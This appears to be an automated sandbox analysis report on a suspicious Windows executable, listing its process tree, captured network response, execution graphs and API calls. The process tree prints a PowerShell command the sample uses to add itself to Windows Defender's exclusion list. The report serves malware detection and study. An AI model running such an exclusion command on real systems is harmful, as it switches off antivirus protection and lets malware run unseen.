                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e1f800ea877eb12-DFW
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1234&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=447&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 33 31 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 [TRUNCATED]
                                                                                  Data Ascii: 31c<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; heigh
                                                                                  Nov 13, 2024 15:37:31.485867023 CET444INData Raw: 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20
                                                                                  Data Ascii: t:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-he


                                                                                  Click to jump to process

                                                                                  Click to jump to process

                                                                                  Click to dive into process behavior distribution

                                                                                  Click to jump to process

                                                                                  Target ID:0
                                                                                  Start time:09:33:21
                                                                                  Start date:13/11/2024
                                                                                  Path:C:\Users\user\Desktop\Item-RQF-9456786.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\Item-RQF-9456786.exe"
                                                                                  Imagebase:0x430000
                                                                                  File size:726'016 bytes
                                                                                  MD5 hash:2980D8A9894FB28427F03922F74D1C76
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:4
                                                                                  Start time:09:33:22
                                                                                  Start date:13/11/2024
                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Item-RQF-9456786.exe"
                                                                                  Imagebase:0xe40000
                                                                                  File size:433'152 bytes
                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:5
                                                                                  Start time:09:33:22
                                                                                  Start date:13/11/2024
                                                                                  Path:C:\Users\user\Desktop\Item-RQF-9456786.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\Item-RQF-9456786.exe"
                                                                                  Imagebase:0xc40000
                                                                                  File size:726'016 bytes
                                                                                  MD5 hash:2980D8A9894FB28427F03922F74D1C76
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:6
                                                                                  Start time:09:33:22
                                                                                  Start date:13/11/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff6d64d0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:7
                                                                                  Start time:09:33:26
                                                                                  Start date:13/11/2024
                                                                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                  Imagebase:0x7ff6ef0c0000
                                                                                  File size:496'640 bytes
                                                                                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:9
                                                                                  Start time:09:33:44
                                                                                  Start date:13/11/2024
                                                                                  Path:C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe"
                                                                                  Imagebase:0xf20000
                                                                                  File size:140'800 bytes
                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  Target ID:10
                                                                                  Start time:09:33:47
                                                                                  Start date:13/11/2024
                                                                                  Path:C:\Windows\SysWOW64\fontview.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\SysWOW64\fontview.exe"
                                                                                  Imagebase:0xa30000
                                                                                  File size:113'152 bytes
                                                                                  MD5 hash:8324ECE6961ADBE6120CCE9E0BC05F76
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate
                                                                                  Has exited:false

                                                                                  Target ID:11
                                                                                  Start time:09:33:59
                                                                                  Start date:13/11/2024
                                                                                  Path:C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe"
                                                                                  Imagebase:0xf20000
                                                                                  File size:140'800 bytes
                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  Target ID:12
                                                                                  Start time:09:34:10
                                                                                  Start date:13/11/2024
                                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                  Imagebase:0x7ff79f9e0000
                                                                                  File size:676'768 bytes
                                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Reset < >

                                                                                    Execution Graph

                                                                                    Execution Coverage:10.3%
                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                    Signature Coverage:5%
                                                                                    Total number of Nodes:60
                                                                                    Total number of Limit Nodes:6
                                                                                    execution_graph 24342 b0add0 24343 b0addf 24342->24343 24345 b0aeb8 24342->24345 24346 b0ae62 24345->24346 24348 b0aec2 24345->24348 24346->24343 24347 b0aefc 24347->24343 24348->24347 24349 b0b100 GetModuleHandleW 24348->24349 24350 b0b12d 24349->24350 24350->24343 24355 b0d560 24356 b0d5a6 24355->24356 24360 b0d740 24356->24360 24363 b0d731 24356->24363 24357 b0d693 24361 b0d76e 24360->24361 24366 b0d0fc 24360->24366 24361->24357 24364 b0d0fc DuplicateHandle 24363->24364 24365 b0d76e 24364->24365 24365->24357 24367 b0d7a8 DuplicateHandle 24366->24367 24368 b0d83e 24367->24368 24368->24361 24369 b04668 24370 b0467a 24369->24370 24371 b04686 24370->24371 24373 b04778 24370->24373 24374 b0479d 24373->24374 24378 b04888 24374->24378 24382 b04878 24374->24382 24380 b048af 24378->24380 24379 b0498c 24379->24379 24380->24379 24386 b044b0 24380->24386 24383 b048af 24382->24383 24384 b044b0 CreateActCtxA 24383->24384 24385 b0498c 24383->24385 24384->24385 24387 b05918 CreateActCtxA 24386->24387 24389 b059db 24387->24389 24351 76d2740 24352 76d278e DrawTextExW 24351->24352 24354 76d27e6 24352->24354 24390 76d34d0 24391 76d350a 24390->24391 24392 76d359b 24391->24392 24393 76d3586 24391->24393 24395 76d11fc 3 API calls 24392->24395 24398 76d11fc 24393->24398 24397 76d35aa 24395->24397 24399 76d1207 24398->24399 24400 76d3591 24399->24400 24403 76d3edf 24399->24403 24409 76d3ef0 24399->24409 24404 76d3f0a 24403->24404 24415 76d1244 24403->24415 24406 76d3f17 24404->24406 24407 76d3f40 CreateIconFromResourceEx 24404->24407 24406->24400 24408 76d3fbe 24407->24408 24408->24400 24410 76d1244 CreateIconFromResourceEx 24409->24410 24412 76d3f0a 24410->24412 24411 76d3f17 24411->24400 24412->24411 24413 76d3f40 CreateIconFromResourceEx 24412->24413 24414 76d3fbe 24413->24414 24414->24400 24416 76d3f40 CreateIconFromResourceEx 24415->24416 24417 76d3fbe 24416->24417 24417->24404

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 294 76d11fc-76d35f0 297 76d35f6-76d35fb 294->297 298 76d3ad3-76d3b3c 294->298 297->298 299 76d3601-76d361e 297->299 306 76d3b43-76d3bcb 298->306 305 76d3624-76d3628 299->305 299->306 307 76d362a-76d3634 call 76d120c 305->307 308 76d3637-76d363b 305->308 350 76d3bd6-76d3c56 306->350 307->308 309 76d363d-76d3647 call 76d120c 308->309 310 76d364a-76d3651 308->310 309->310 315 76d376c-76d3771 310->315 316 76d3657-76d3687 310->316 319 76d3779-76d377e 315->319 320 76d3773-76d3777 315->320 327 76d3e56-76d3e7c 316->327 329 76d368d-76d3760 call 76d1218 * 2 316->329 324 76d3790-76d37c0 call 76d1224 * 3 319->324 320->319 323 76d3780-76d3784 320->323 326 76d378a-76d378d 323->326 323->327 324->350 351 76d37c6-76d37c9 324->351 326->324 338 76d3e8c 327->338 339 76d3e7e-76d3e8a 327->339 329->315 358 76d3762 329->358 343 76d3e8f-76d3e94 338->343 339->343 365 76d3c5d-76d3cdf 350->365 351->350 353 76d37cf-76d37d1 351->353 353->350 354 76d37d7-76d380c 353->354 354->365 366 76d3812-76d381b 354->366 358->315 371 76d3ce7-76d3d69 365->371 368 76d397e-76d3982 366->368 369 76d3821-76d387b call 76d1224 * 2 call 76d1234 * 2 366->369 370 76d3988-76d398c 368->370 368->371 415 76d388d 369->415 416 76d387d-76d3886 369->416 375 76d3d71-76d3d9e 370->375 376 76d3992-76d3998 370->376 371->375 388 76d3da5-76d3e25 375->388 380 76d399c-76d39d1 376->380 381 76d399a 376->381 385 76d39d8-76d39de 380->385 381->385 385->388 389 76d39e4-76d39ec 385->389 444 76d3e2c-76d3e4e 388->444 393 76d39ee-76d39f2 389->393 394 76d39f3-76d39f5 389->394 393->394 399 76d3a57-76d3a5d 394->399 400 76d39f7-76d3a1b 394->400 405 76d3a7c-76d3aaa 399->405 406 76d3a5f-76d3a7a 399->406 433 76d3a1d-76d3a22 400->433 434 76d3a24-76d3a28 400->434 425 76d3ab2-76d3abe 405->425 406->425 418 76d3891-76d3893 415->418 417 76d3888-76d388b 416->417 416->418 417->418 423 76d389a-76d389e 418->423 424 76d3895 418->424 430 76d38ac-76d38b2 423->430 431 76d38a0-76d38a7 423->431 424->423 425->444 445 76d3ac4-76d3ad0 425->445 438 76d38bc-76d38c1 430->438 439 76d38b4-76d38ba 430->439 437 76d3949-76d394d 431->437 441 76d3a34-76d3a45 433->441 434->327 442 76d3a2e-76d3a31 434->442 446 76d396c-76d3978 437->446 447 76d394f-76d3969 437->447 448 76d38c7-76d38cd 438->448 439->448 483 76d3a47 call 76d3edf 441->483 484 76d3a47 call 76d3ef0 441->484 442->441 444->327 446->368 446->369 447->446 452 76d38cf-76d38d1 448->452 453 76d38d3-76d38d8 448->453 459 76d38da-76d38ec 452->459 453->459 456 76d3a4d-76d3a55 456->425 461 76d38ee-76d38f4 459->461 462 76d38f6-76d38fb 459->462 466 76d3901-76d3908 461->466 462->466 470 76d390e 466->470 471 76d390a-76d390c 466->471 474 76d3913-76d391e 470->474 471->474 475 76d3920-76d3923 474->475 476 76d3942 474->476 475->437 478 76d3925-76d392b 475->478 476->437 479 76d392d-76d3930 478->479 480 76d3932-76d393b 478->480 479->476 479->480 480->437 482 76d393d-76d3940 480->482 482->437 482->476 483->456 484->456
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2291579180.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76d0000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Hgq$Hgq$Hgq$Hgq$Hgq
                                                                                    • API String ID: 0-2022333140
                                                                                    • Opcode ID: bf9032d4ae284a1a077e1c1418a412f2f9835791557be60e2cb8c85b806abdf7
                                                                                    • Instruction ID: 93e4c117216a26baaf7db171f70ed0777161d9c6a957eb223da6d6bd311fba9e
                                                                                    • Opcode Fuzzy Hash: bf9032d4ae284a1a077e1c1418a412f2f9835791557be60e2cb8c85b806abdf7
                                                                                    • Instruction Fuzzy Hash: BA3283B0F10219CFDB54DFA9C8507AEBBF2AF89300F14856AD44AAB395DB349D41CB91

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 485 76d94f0-76d9518 486 76d951f-76d95db 485->486 487 76d951a 485->487 490 76d95dd-76d9603 486->490 491 76d95e0-76d95ed 486->491 487->486 493 76d9609-76d9633 490->493 494 76d9af3-76d9b35 490->494 491->490 497 76d9639-76d9651 493->497 498 76d9d00-76d9d0c 493->498 503 76d9b38-76d9b3c 494->503 499 76d9657-76d9658 497->499 500 76d9d12-76d9d1b 497->500 498->500 502 76d9ce6-76d9cf2 499->502 504 76d9d21-76d9d2d 500->504 505 76d965d-76d9669 502->505 506 76d9cf8-76d9cff 502->506 507 76d970e-76d9712 503->507 508 76d9b42-76d9b48 503->508 517 76d9d33-76d9d3f 504->517 512 76d966b 505->512 513 76d9670-76d968b 505->513 510 76d9724-76d972a 507->510 511 76d9714-76d9722 507->511 508->494 509 76d9b4a-76d9ba5 508->509 532 76d9bdc-76d9c06 509->532 533 76d9ba7-76d9bda 509->533 515 76d976f-76d9773 510->515 514 76d9782-76d97b4 511->514 512->513 513->504 516 76d9691-76d96b6 513->516 538 76d97de 514->538 539 76d97b6-76d97c2 514->539 518 76d972c-76d9738 515->518 519 76d9775 515->519 516->517 531 76d96bc-76d96be 516->531 522 76d9d45-76d9d4c 517->522 524 76d973f-76d9747 518->524 525 76d973a 518->525 521 76d9778-76d977c 519->521 521->514 527 76d96f4-76d970b 521->527 529 76d976c 524->529 530 76d9749-76d975d 524->530 525->524 527->507 529->515 535 76d96c1-76d96cc 530->535 536 76d9763-76d976a 530->536 531->535 547 76d9c0f-76d9c8e 532->547 533->547 535->522 540 76d96d2-76d96ef 535->540 536->519 545 76d97e4-76d9811 538->545 542 76d97cc-76d97d2 539->542 543 76d97c4-76d97ca 539->543 540->521 548 76d97dc 542->548 543->548 552 76d9860-76d98f3 545->552 553 76d9813-76d984b 545->553 560 76d9c95-76d9ca8 547->560 548->545 568 76d98fc-76d98fd 552->568 569 76d98f5 552->569 561 76d9cb7-76d9cbc 553->561 560->561 562 76d9cbe-76d9ccc 561->562 563 76d9cd3-76d9ce3 561->563 562->563 563->502 570 76d994e-76d9954 568->570 569->568 571 76d98ff-76d991e 570->571 572 76d9956-76d9a18 570->572 573 76d9925-76d994b 571->573 574 76d9920 571->574 583 76d9a59-76d9a5d 572->583 584 76d9a1a-76d9a53 572->584 573->570 574->573 585 76d9a5f-76d9a98 583->585 586 76d9a9e-76d9aa2 583->586 584->583 585->586 587 76d9aa4-76d9add 586->587 588 76d9ae3-76d9ae7 586->588 587->588 588->509 591 76d9ae9-76d9af1 588->591 591->503
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2291579180.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76d0000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 4'cq$:$pgq$~
                                                                                    • API String ID: 0-1276774758
                                                                                    • Opcode ID: 13a44cfdd5dbf1dee3d9835570e9572c2d7e3f6bb5a43b41eb758a24d1de0aa1
                                                                                    • Instruction ID: 7b4dd9844a31417878f8d442c0c87fd5a0ced8d6b7cb9614683a37ba2fa8c1db
                                                                                    • Opcode Fuzzy Hash: 13a44cfdd5dbf1dee3d9835570e9572c2d7e3f6bb5a43b41eb758a24d1de0aa1
                                                                                    • Instruction Fuzzy Hash: 8D42E0B5E10218DFDB15CFA9C980B99BBB2FF49304F1580E9E50AAB261D731AD91CF50
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2291579180.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76d0000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9b822bccb302b3513897846857f88d1a3938b8bab903d29191698f639753968f
                                                                                    • Instruction ID: 7cbb97f7a6ac7491cac9903e65b43de8b9e6679390cd2d9498371bce78a37cd6
                                                                                    • Opcode Fuzzy Hash: 9b822bccb302b3513897846857f88d1a3938b8bab903d29191698f639753968f
                                                                                    • Instruction Fuzzy Hash: 26C17BB0E10259CFCF14CFA6D880799BBB2AF89300F08C5AAD44AAB355E7309D85CF51
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2291579180.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76d0000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 542f1068040221d06566548ccd00fc9ac05b720b6f09e80232d0e8c0a37cc2ae
                                                                                    • Instruction ID: d734c5f64bf58a6005166538d4baf55cf555c046ab84b87dbed4fb1e08b6573b
                                                                                    • Opcode Fuzzy Hash: 542f1068040221d06566548ccd00fc9ac05b720b6f09e80232d0e8c0a37cc2ae
                                                                                    • Instruction Fuzzy Hash: 55C15AB0E10259CFDF14CFA5D880799BBB2AF89300F18C1AAD44AAB355EB709D85CF51
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270704129.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b00000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8ac12c244f4763830966b875734f185fb48d0654ac8f97f6d05c1872bd69bf4b
                                                                                    • Instruction ID: 2d139bb3179322fce3ebf6f3ee9f83ecc346cfe4777559267144f082bb2c26bb
                                                                                    • Opcode Fuzzy Hash: 8ac12c244f4763830966b875734f185fb48d0654ac8f97f6d05c1872bd69bf4b
                                                                                    • Instruction Fuzzy Hash: DF51B574E012098FDB08DFA9D9459EEBBF2FF89310F108569E409AB365DB316941CF90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270704129.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b00000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 05a0a408c61851d55cc4839e6536b2c9ca24e09bd3d50db23c156cb4e04aedde
                                                                                    • Instruction ID: 0f49081f5bc201a2847da22bef53730daee747ac1ec03a695c1a9599e2fe6e3d
                                                                                    • Opcode Fuzzy Hash: 05a0a408c61851d55cc4839e6536b2c9ca24e09bd3d50db23c156cb4e04aedde
                                                                                    • Instruction Fuzzy Hash: FF5195B4E012098FDB08DFA9D9459EEBBF2FF89310F108569E409AB365DB316941CF90

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 791 b0aeb8-b0aec0 792 b0ae62-b0ae95 791->792 793 b0aec2-b0aed7 791->793 805 b0aea4-b0aeac 792->805 806 b0ae97-b0aea2 792->806 795 b0af03-b0af07 793->795 796 b0aed9-b0aee6 call b0a240 793->796 798 b0af09-b0af13 795->798 799 b0af1b-b0af5c 795->799 803 b0aee8 796->803 804 b0aefc 796->804 798->799 808 b0af69-b0af77 799->808 809 b0af5e-b0af66 799->809 853 b0aeee call b0b160 803->853 854 b0aeee call b0b151 803->854 804->795 810 b0aeaf-b0aeb4 805->810 806->810 811 b0af79-b0af7e 808->811 812 b0af9b-b0af9d 808->812 809->808 814 b0af80-b0af87 call b0a24c 811->814 815 b0af89 811->815 817 b0afa0-b0afa7 812->817 813 b0aef4-b0aef6 813->804 816 b0b038-b0b0f8 813->816 819 b0af8b-b0af99 814->819 815->819 848 b0b100-b0b12b GetModuleHandleW 816->848 849 b0b0fa-b0b0fd 816->849 820 b0afb4-b0afbb 817->820 821 b0afa9-b0afb1 817->821 819->817 824 b0afc8-b0afd1 call b0a25c 820->824 825 b0afbd-b0afc5 820->825 821->820 829 b0afd3-b0afdb 824->829 830 b0afde-b0afe3 824->830 825->824 829->830 831 b0b001-b0b00e 830->831 832 b0afe5-b0afec 830->832 839 b0b010-b0b02e 831->839 840 b0b031-b0b037 831->840 832->831 834 b0afee-b0affe call b0a26c call b0a27c 832->834 834->831 839->840 850 b0b134-b0b148 848->850 851 b0b12d-b0b133 848->851 849->848 851->850 853->813 854->813
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 00B0B11E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270704129.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b00000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModule
                                                                                    • String ID:
                                                                                    • API String ID: 4139908857-0
                                                                                    • Opcode ID: b7f1766c9e882ce451b13289c467a61a4b94f5f8fde533cf4606a80fbefb8654
                                                                                    • Instruction ID: 9e02ca0a00164ff8f5ef96d2ec6293d28e134b3c731adb1ed2e17b4f044e0665
                                                                                    • Opcode Fuzzy Hash: b7f1766c9e882ce451b13289c467a61a4b94f5f8fde533cf4606a80fbefb8654
                                                                                    • Instruction Fuzzy Hash: 34919BB0A00B418FD725CF29D45479ABBF1FF88304F148AAEE486DBA91D735E845CB91

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 855 b044b0-b059d9 CreateActCtxA 858 b059e2-b05a3c 855->858 859 b059db-b059e1 855->859 866 b05a4b-b05a4f 858->866 867 b05a3e-b05a41 858->867 859->858 868 b05a60 866->868 869 b05a51-b05a5d 866->869 867->866 871 b05a61 868->871 869->868 871->871
                                                                                    APIs
                                                                                    • CreateActCtxA.KERNEL32(?), ref: 00B059C9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270704129.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b00000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID: Create
                                                                                    • String ID:
                                                                                    • API String ID: 2289755597-0
                                                                                    • Opcode ID: 0b22624a481dc796ea3d162b2e5fc025be7d398984adf70695919f426592ad2a
                                                                                    • Instruction ID: dd43be7f672996d0b805e183bfc78050b4330e1f5a2c874f407beed0f2c071d7
                                                                                    • Opcode Fuzzy Hash: 0b22624a481dc796ea3d162b2e5fc025be7d398984adf70695919f426592ad2a
                                                                                    • Instruction Fuzzy Hash: 9C41D2B0D0061DCBDB24CFAAC884B9EBBF5FF48304F60816AD408AB251DB756945CF91

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 872 b0590c-b0590f 873 b0591c-b059d9 CreateActCtxA 872->873 875 b059e2-b05a3c 873->875 876 b059db-b059e1 873->876 883 b05a4b-b05a4f 875->883 884 b05a3e-b05a41 875->884 876->875 885 b05a60 883->885 886 b05a51-b05a5d 883->886 884->883 888 b05a61 885->888 886->885 888->888
                                                                                    APIs
                                                                                    • CreateActCtxA.KERNEL32(?), ref: 00B059C9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270704129.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b00000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID: Create
                                                                                    • String ID:
                                                                                    • API String ID: 2289755597-0
                                                                                    • Opcode ID: 3f5e02c7a47f4629d371251e2138055a77e4db50257e1ebdd2aac22e4d0d49eb
                                                                                    • Instruction ID: 4e024a237a9290e56556ee848dd13998c8693f0ef4b8b848868556f53d2adc5c
                                                                                    • Opcode Fuzzy Hash: 3f5e02c7a47f4629d371251e2138055a77e4db50257e1ebdd2aac22e4d0d49eb
                                                                                    • Instruction Fuzzy Hash: F741F2B0D00619CFDB24CFA9C8847DEBBF2BF48304F24806AD408AB291DB756946CF91

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 889 76d3ef0-76d3f15 call 76d1244 892 76d3f2a-76d3fbc CreateIconFromResourceEx 889->892 893 76d3f17-76d3f27 889->893 897 76d3fbe-76d3fc4 892->897 898 76d3fc5-76d3fe2 892->898 897->898
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2291579180.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76d0000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFromIconResource
                                                                                    • String ID:
                                                                                    • API String ID: 3668623891-0
                                                                                    • Opcode ID: e0883f309742181a7421054f7f424635702ab8fb0bdfda725a7c1943fdd17a3e
                                                                                    • Instruction ID: 745291231d3c7bbd369c36037cb4c8275e539e76e20adc7a6a59131c7cbb34ce
                                                                                    • Opcode Fuzzy Hash: e0883f309742181a7421054f7f424635702ab8fb0bdfda725a7c1943fdd17a3e
                                                                                    • Instruction Fuzzy Hash: E33169B2904389DFCB11DFAAD804AEEBFF8EF09310F18805AF954A7211C3359854DBA1

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
